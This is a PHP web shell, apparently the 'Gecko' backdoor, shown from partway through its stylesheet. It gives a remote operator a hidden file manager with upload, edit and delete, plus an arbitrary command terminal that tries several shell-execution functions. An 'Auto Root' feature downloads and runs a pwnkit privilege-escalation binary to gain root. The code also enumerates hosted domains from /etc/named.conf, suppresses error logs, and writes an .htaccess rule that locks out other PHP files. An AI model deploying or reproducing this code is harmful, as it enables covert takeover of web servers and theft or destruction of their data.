}
.terminal-body header a {
float: right;
color: black;
font-size: large;
background-color: white;
position: relative;
z-index: 11;
border-radius: 5px;
margin-top: -45px;
padding: 10px 30px;
}
.terminal-body header a:hover {
background-color: #29292e;
color: white;
border: 1px solid #303038;
}
.output-terminal {
width: 99.5%;
height: 100%;
color: black;
background-color: white;
}
.terminal-input {
width: 90%;
padding: 6px;
margin-left: 1px;
border: none;
border-bottom: 2px solid black;
}
.terminal-submit {
margin: 2.5px;
padding: 7.5px 25px;
background-color: black;
color: white;
border: none;
border-radius: 3px;
}
.pwd-body {
padding: 15px 8px;
font-weight: bold;
}
.border {
border: 1px solid black;
border-radius: 2px;
}
.file-box {
position: fixed;
width: 100%;
height: 100vh;
top: 0;
bottom: 0;
left: 0;
right: 0;
background-color: rgba(0, 0, 0, 0.5);
z-index: 1;
}
.file-content {
width: 90%;
background-color: white;
height: 70%;
margin: auto;
margin-top: 20px;
color: black;
}
.file-content textarea {
width: 99.5%;
height: 70vh;
}
.file-header {
background-color: #1A1A1D;
padding: 15px;
}
.file-header ul {
list-style: none;
}
.file-header li {
display: inline-block;
margin: 0px 30px;
}
.file-header li:nth-child(3) {
float: right;
margin-right: -5px;
}
.file-header li:nth-child(3) a {
color: black;
font-size: large;
background-color: white;
z-index: 11;
border-radius: 5px;
padding: 10px 30px;
}
.file-header li:nth-child(3) a:hover {
background-color: #29292e;
color: white;
border: 1px solid #303038;
}
.file-header li button {
color: black;
cursor: pointer;
font-weight: bold;
background: white;
font-size: 15px;
border: 1px solid white;
padding: 10px 15px;
margin: -10px -15px;
border-radius: 5px;
}
.link-rename {
padding: 10px 15px;
border: 1px solid white;
background-color: white;
color: black;
border-radius: 5px;
margin: -10px -15px;
}
</style>
</head>
<?php
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
function Redirect($url, $permanent = false)
{
header('Location: ' . $url, true, $permanent ? 301 : 302);
exit();
}
if (isset($_GET['dir'])) {
$cdir = unhex($_GET['dir']);
$fungsi[10]($cdir);
} else {
$cdir = $fungsi[9]();
}
$get_cwd = $fungsi[9]();
$scdir = $fungsi[16]("{.[!.],}*", GLOB_BRACE);
?>
<body>
<div class="list-shell">
<ul>
<li><?= $fungsi[11](); ?></li>
<li><?= $_SERVER[$fungsi[23]]; ?></li>
<li>Server IP : <?= $_SERVER['SERVER_ADDR']; ?> & Your IP : <?= $_SERVER['REMOTE_ADDR']; ?></li>
<li>Domains : <?= symlinkDomain(); ?></li>
<li>
User : <?= $fungsi[22](); ?>
</li>
<form action="" method="post" enctype="<?= $fungsi[32] ?>">
<li><input type="file" name="gecko-file" id=""><input type="submit" class="upload-submit" name="upload-submit" value="Upload"></li>
</form>
</ul>
<div class="tool-menu-header">
<div class="list-tool">
<ul class="tool-menu">
<li><a href="?dir=<?= hex($fungsi[9]()); ?>&action=terminal" class=""><i class="fa-solid fa-terminal"></i> Terminal</a></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>&action=root-terminal" class=""><i class="fa-solid fa-code"></i> Auto Root</a></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>&create=file" class=""><i class="fa-solid fa-file-circle-plus"></i> Create File</a></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>&create=folder" class=""><i class="fa-solid fa-folder-plus"></i> Create Folder</a></li>
<li><a href="https://www.exploit-db.com/search?q=Linux%20Kernel%20<?= linux_version(); ?>" class=""><i class="fa-solid fa-bug"></i> Localroot Suggester</a></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>&backdoor=true" class=""><i class="fa-solid fa-virus"></i> Backdoor Destroyer</a></li>
<li><a href="https://github.com/MadExploits/Gecko/" class=""><i class="fa-solid fa-book"></i> Readme</a></li>
</ul>
</div>
</div>
<br>
</div>
<div class="border">
<div class="pwd">
<form action="" method="post">
<div class="pwd-body">
<?php
$cwd = str_replace("\\", "/", $get_cwd); // untuk dir garis windows
$pwd = explode("/", $cwd);
foreach ($pwd as $id => $val) {
if ($val == '' && $id == 0) {
echo '<a href="?dir=' . hex('/') . '"><i class="fa-solid fa-folder-plus"></i> / </a>';
continue;
}
if ($val == '') continue;
echo '<a href="?dir=';
for ($i = 0; $i <= $id; $i++) {
echo hex($pwd[$i]);
if ($i != $id) echo hex("/");
}
echo '">' . $val . ' / ' . '</a>';
}
?>
</div>
<div class="settings">
<select name="action-gecko" id="" class="action-gecko">
<option value="delete">Delete</option>
<option value="unzip">Unzip</option>
</select>
<input type="submit" class="select-submit" value="Submit" name="gecko-submit">
</div>
</div>
<table style="width:100%;">
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Permission</th>
<th>Date</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<!-- FOLDER NYA -->
<?php foreach ($scdir as $dir) : ?>
<?php if ($fungsi[18]($dir)) : ?>
<tr>
<td>
<input type="checkbox" name="check-gecko[]" id="folder" value="<?= $dir; ?>"> <label for="folder"><i class="fa-solid fa-folder"></i> <a href="?dir=<?= hex($cwd . "/" . $dir); ?>" class="link-shell"><?= $dir; ?></a>
</td>
<td>[ DIR ]</td>
<td><?php if ($fungsi[19]($fungsi[9]() . '/' . $dir)) echo '<font color="#00ff00">';
elseif (!$fungsi[20]($fungsi[9]() . '/' . $dir)) echo '<font color="red">';
echo perms($fungsi[9]() . '/' . $dir);
?>
</td>
<td>
<?php echo date(
"Y-m-d H:i",
$fungsi[24]($dir)
); ?>
</td>
<td>
<a href="?dir=<?= hex($fungsi[9]()) ?>&rename=<?= $dir ?>"><i class="fa-solid fa-file-pen"></i></a> <a href="?dir=<?= hex($fungsi[9]()) ?>&chmod=<?= $dir ?>"><i class="fa-solid fa-user-pen"></i></a>
</td>
</tr>
<?php endif; ?>
<?php endforeach; ?>
<!-- FILE NYA -->
<?php foreach ($scdir as $_file) : ?>
<?php if ($fungsi[17]($_file)) : ?>
<tr>
<td>
<input type="checkbox" name="check-gecko[]" id="folder" value="<?= $_file; ?>"> <label for="folder"><i class="fa-regular fa-file"></i> <a href="?dir=<?= hex($cwd . "/"); ?>&f=<?= $_file; ?>" class="link-shell"><?= $_file; ?></a>
</td>
<td><?= formatSize($fungsi[21]($_file)); ?></td>
<td>
<?php if ($fungsi[19]($fungsi[9]() . '/' . $_file)) {
echo '<font color="#00ff00">';
} elseif (!$fungsi[20]($fungsi[9]() . '/' . $_file)) {
echo '<font color="red">';
}
echo perms($fungsi[9]() . '/' . $_file);
?>
</td>
<td>
<?php echo date(
"Y-m-d H:i",
$fungsi[24]($_file)
); ?>
</td>
<td>
<a href="?dir=<?= hex($fungsi[9]()) ?>&rename=<?= $_file ?>"><i class="fa-solid fa-file-pen"></i></a> <a href="?dir=<?= hex($fungsi[9]()) ?>&download=<?= $_file ?>"><i class="fa-solid fa-download"></i></a> <a href="?dir=<?= hex($fungsi[9]()) ?>&chmod=<?= $_file ?>"><i class="fa-solid fa-user-pen"></i></a>
</td>
</tr>
<?php endif; ?>
<?php endforeach; ?>
</tbody>
</table>
</div>
<br>
</form>
<?php
if ($_GET['create'] == True) :
?>
<div class="create">
<div class="modal">
<?php if ($_GET['create'] == "file") : ?>
<header>
<h2><?= '<i class="fa-solid fa-file-circle-plus"></i> Create File'; ?></h2>
</header>
<form action="" method="post">
<input type="text" name="create_file" id="" placeholder=" Nama File">
<?php elseif ($_GET['create'] == "folder") : ?>
<header>
<h2><?= '<i class="fa-solid fa-folder-plus"> </i>Create Folder'; ?></h2>
</header>
<form action="" method="post">
<input type="text" name="create_folder" id="" placeholder=" Nama Folder">
<?php endif; ?>
<ul>
<li><input type="submit" name="submit-modal" class="btn-modal fw-bold" value="Submit"></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>">Close</a></li>
</ul>
</form>
</div>
</div>
<?php endif; ?>
<?php
if ($_GET['action'] == "terminal") :
?>
<div class="terminal-content">
<div class="terminal">
<div class="terminal-body">
<header>
<h3><i class="fa-solid fa-terminal"></i> </h3>
<a href="?dir=<?= hex($fungsi[9]()); ?>"><i class="fa-solid fa-xmark"></i></a>
</header>
<form action="" method="post">
<center>
<input type="text" placeholder="uname -a" name="terminal" class="terminal-input" autofocus>
<input type="submit" value=">" name="submit-terminal" class="terminal-submit">
</center>
</form>
<?php if (isset($_POST['submit-terminal'])) : ?>
<textarea class="output-terminal" disabled><?= htmlspecialchars($fungsi[14]($_POST['terminal'] . " 2>&1")); ?></textarea>
<?php endif; ?>
</div>
</div>
</div>
<?php endif; ?>
<?php if ($_GET['action'] == "root-terminal") : ?>
<div class="terminal-content">
<div class="terminal">
<div class="terminal-body">
<header>
<h3><i class="fa-solid fa-terminal"></i> </h3>
<a href="?dir=<?= hex($fungsi[9]()); ?>"><i class="fa-solid fa-xmark"></i></a>
</header>
<form action="" method="post">
<center>
<input type="text" placeholder="root@terminal~#" name="terminal-root" class="terminal-input" autofocus>
<input type="submit" value=">" name="submit-root" class="terminal-submit">
</center>
</form>
<?php if (isset($_POST['submit-root'])) : ?>
<textarea class="output-terminal" disabled>
<?php
$terminal = $_POST['terminal-root'];
if ($terminal == "root") {
echo "[+] Downloading The source \n";
echo $fungsi[14]("wget " . $fungsi[34] . " --no-check-certificate");
echo "[!] Chmod file pwnkit....\n";
echo $fungsi[14]("chmod +x pwnkit");
echo "[+] Testing if this kernel vulnerable...\n";
echo $fungsi[14]('./pwnkit "id" >> mad-pwnkit');
$check_vulnerable = $fungsi[27]($fungsi[9]() . "/mad-pwnkit");
$explode_mad_pwkit = explode(" ", $check_vulnerable);
if ($explode_mad_pwkit[0] == "uid=0(root)") {
echo "[~] This Kernel is vulnerable congrats!\n";
} else {
echo "[!] This kernel is not Vulnerable Sorry :)";
return;
}
echo "[+] Giving Permission on mad-pwnkit\n";
echo $fungsi[14]("chmod +x mad-pwnkit");
if (!$fungsi[14]('./pwnkit "id"')) {
echo "[!] Cannot running pwnkit";
} else {
echo "[!] Done Sir. now u can running on root user!";
exit;
}
}
echo htmlspecialchars($fungsi[14]('./pwnkit "' . $terminal . '"'));
?>
</textarea>
<?php endif; ?>
</div>
</div>
</div>
<?php endif; ?>
<?php
if (isset($_POST['submit-modal'])) {
if ($_POST['create_file']) {
$file = $_POST['create_file'];
if ($fungsi[25]($file)) {
echo success();
} else {
echo failed();
}
} elseif ($_POST['create_folder']) {
$folder = $_POST['create_folder'];
if ($fungsi[26]($folder)) {
echo success();
} else {
echo failed();
}
}
} ?>
<br>
<?php
if (isset($_GET['f'])) :
?>
<div class="file-box">
<div class="file-content">
<form action="" method="post">
<div class="file-header">
<ul>
<li><button type="submit" name="submit-file"><i class="fa-regular fa-floppy-disk"></i> Save</button></li>
<li><a href="?dir=<?= hex($fungsi[9]()) ?>&rename=<?= $_GET['f'] ?>" class="link-rename"><i class="fa-solid fa-pen-to-square"></i> Rename</a></li>
<li> <a href="?dir=<?= hex($fungsi[9]()); ?>"><i class="fa-solid fa-xmark"></i></a></li>
</ul>
</div>
<textarea name="text-file"><?php echo htmlspecialchars($fungsi[27]($_GET['f'])); ?></textarea>
</form>
</div>
</div>
<?php endif; ?>
<?php if ($_GET['rename'] == True) : ?>
<div class="create">
<div class="modal">
<header>
<h2><?= $_GET['rename'] ?></h2>
</header>
<form action="" method="post">
<input type="text" name="rename" id="" placeholder=" File/Folder">
<ul>
<li><input type="submit" name="submit-rename" class="btn-modal fw-bold" value="Submit"></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>">Close</a></li>
</ul>
</form>
</div>
</div>
<?php endif; ?>
<?php if ($_GET['chmod'] == True) : ?>
<div class="create">
<div class="modal">
<header>
<h2><?= $_GET['chmod'] ?></h2>
</header>
<form action="" method="post">
<input type="number" style="width:100%" name="chmod" id="" placeholder=" 775">
<ul>
<li><input type="submit" name="submit-chmod" class="btn-modal fw-bold" value="Submit"></li>
<li><a href="?dir=<?= hex($fungsi[9]()); ?>">Close</a></li>
</ul>
</form>
</div>
</div>
<?php endif; ?>
</body>
</html>
<?php
if ($_GET['backdoor'] == True) {
// check if htaccess have this code
$file_htaccess = $fungsi[27]($_SERVER[$fungsi[33]] . "/htaccess");
$cari_code = explode('<', $file_htaccess);
if (!end($cari_code) == '/FilesMatch>') {
// pengecekan nama file sekarang
$namafile = $_SERVER['SCRIPT_FILENAME'];
$fileUtama = explode("/", $namafile);
$htaccess_text = '
<FilesMatch ".ph*|Ph*|pH*|PH*">
Order Deny,Allow
Deny from all
</FilesMatch>
<FilesMatch "' . end($fileUtama) . '|index.php|index.html|*.png|.htaccess">
Order Deny, Allow
Allow from all
</FilesMatch>';
$document_root = $_SERVER[$fungsi[33]];
$cmd = $fungsi[14]("echo '" . $htaccess_text . "' >> " . $document_root . "/.htaccess");
if ($cmd) {
echo success();
} else {
echo failed();
}
} else {
echo failed();
}
}
if (isset($_POST['submit-chmod'])) {
$numberChmod = $_POST['chmod'];
$chm_o_d = chmod($fungsi[9] . "/" . $_GET['chmod'], is_int($numberChmod));
if ($chm_o_d) {
echo success();
} else {
echo failed();
}
}
if (isset($_POST['upload-submit'])) {
$name_file = $_FILES['gecko-file']['name'];
$tmp_name = $_FILES['gecko-file']['tmp_name'];
$move = move_uploaded_file($tmp_name, __DIR__ . "/" . $name_file);
if ($move) {
echo success();
} else {
echo failed();
}
}
if (isset($_POST['submit-rename'])) {
$new_name = $_POST['rename'];
$re_name = rename($fungsi[9]() . "/" . $_GET['rename'], $new_name);
if ($re_name) {
echo success();
} else {
echo failed();
}
}
if (isset($_POST['submit-file'])) {
$textarea = $_POST['text-file'];
$write = $fungsi[28]($fungsi[9]() . "/" . $_GET['f'], $textarea);
if ($write) {
echo success();
} else {
echo failed();
}
}
if (isset($_POST['gecko-submit'])) {
$item = $_POST['check-gecko'];
if ($_POST['action-gecko'] == "delete") {
foreach ($item as $it) {
$repl = str_replace("\\", "/", $fungsi[9]()); // Untuk Windows Path
$fd = $repl . "/" . $it;
if ($fungsi[18]($fd) || $fungsi[17]($fd)) {
$rmdir = unlinkDir($fd);
$rmfile = $fungsi[30]($fd);
if ($rmdir || $rmfile) {
echo success();
} else {
echo failed();
}
}
}
}
}
function success()
{
return '<meta http-equiv="refresh" content="0;url=?dir=' . hex($GLOBALS['fungsi'][9]()) . '&response=success">';
}
function failed()
{
return '<meta http-equiv="refresh" content="0;url=?dir=' . hex($GLOBALS['fungsi'][9]()) . '&response=failed">';
}
function _mad_cmd($de)
{
$out = '';
try {
if (function_exists('shell_exec')) {
return @$GLOBALS['fungsi'][0]($de);
} else if (function_exists('system')) {
@$GLOBALS['fungsi'][3]($de);
} else if (function_exists('exec')) {
$exec = array();
@$GLOBALS['fungsi'][1]($de, $exec);
$out = @join("\n", $exec);
return $exec;
} else if (function_exists('passthru')) {
@$GLOBALS['fungsi'][2]($de);
} else if (function_exists('popen') && function_exists('pclose')) {
if (is_resource($f = @$GLOBALS['fungsi'][5]($de, "r"))) {
$out = "";
while (!@feof($f))
$out .= fread($f, 1024);
return $out;
$GLOBALS['fungsi'][6]($f);
}
} else if (function_exists('proc_open')) {
$pipes = array();
$process = @$GLOBALS['fungsi'][4]($de . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
$out = @$GLOBALS['fungsi'][8]($pipes[1]);
return $out;
} else if (class_exists('COM')) {
$madWs = new COM('WScript.shell');
$exec = $madWs->$GLOBALS['fungsi'][1]('cmd.exe /c ' . $_POST['alfa1']);
$stdout = $exec->StdOut();
$out = $stdout->ReadAll();
}
} catch (Exception $e) {
}
return $out;
}
function unlinkDir($dir)
{
$dirs = array($dir);
$files = array();
for ($i = 0;; $i++) {
if (isset($dirs[$i]))
$dir = $dirs[$i];
else
break;
if ($openDir = opendir($dir)) {
while ($readDir = @readdir($openDir)) {
if ($readDir != "." && $readDir != "..") {
if ($GLOBALS['fungsi'][18]($dir . "/" . $readDir)) {
$dirs[] = $dir . "/" . $readDir;
} else {
$files[] = $dir . "/" . $readDir;
}
}
}
}
}
foreach ($files as $file) {
$GLOBALS['fungsi'][30]($file);
}
$dirs = array_reverse($dirs);
foreach ($dirs as $dir) {
$GLOBALS['fungsi'][29]($dir);
}
}
function formatSize($bytes)
{
$types = array('<span class="file-size">B</span>', '<span class="file-size">KB</span>', '<span class="file-size">MB</span>', '<span class="file-size">GB</span>', '<span class="file-size">TB</span>');
for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++);
return (round($bytes, 2) . " " . $types[$i]);
}
function symlinkDomain()
{
$d0mains = @file("/etc/named.conf", false);
if (!$d0mains) {
$dom = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
$GLOBALS["need_to_update_header"] = "true";
} else {
$count = 0;
foreach ($d0mains as $d0main) {
if (@strstr($d0main, "zone")) {
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
flush();
$count++;
}
}
}
$dom = "$count Domain";
}
return $dom;
}
function linux_version()
{
$pecah = explode(" ", $GLOBALS['fungsi'][11]());
$pcah = explode("-", $pecah[2]);
return $pcah[0];
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hex($n)
{
$y = '';
for ($i = 0; $i < strlen($n); $i++) {
$y .= dechex(ord($n[$i]));
}
return $y;
}
function unhex($y)
{
$n = '';
for ($i = 0; $i < strlen($y) - 1; $i += 2) {
$n .= chr(hexdec($y[$i] . $y[$i + 1]));
}
return $n;
}
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists